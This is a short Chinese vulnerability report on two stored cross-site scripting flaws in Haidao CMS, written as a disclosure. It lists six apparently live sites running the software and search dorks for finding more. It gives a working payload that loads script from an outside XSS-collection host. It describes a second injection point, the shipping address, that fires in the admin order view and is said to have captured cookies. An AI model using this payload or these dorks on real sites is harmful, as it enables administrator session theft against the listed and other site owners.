海盗CMS两处XSS漏洞(均可打管理)
官方网站 http://www.haidao.la 
案例网站:
http://www.malchinail.com
http://tuhaow.com/
http://tianjinshengyuan.com/
http://www.wangetongkuai.com
http://www.beizip.com
http://hifresh.cn
关键词 intext:Powered by Haidao v1.1.7
或者intitle:Powered by Haidao

漏洞证明:我是下载源码本地测试的1.jpg第一处商品咨询

 <iframe srcdoc="<img src=x:x onerror=document.body.appendChild(document.createElement(/script/.source)).src='http://xxs.la/FH0w3s'>"></iframe>


成功弹窗

再来第二处

收货地址,管理员后台查看订单发货的时候即可触发

再发一张成功cookies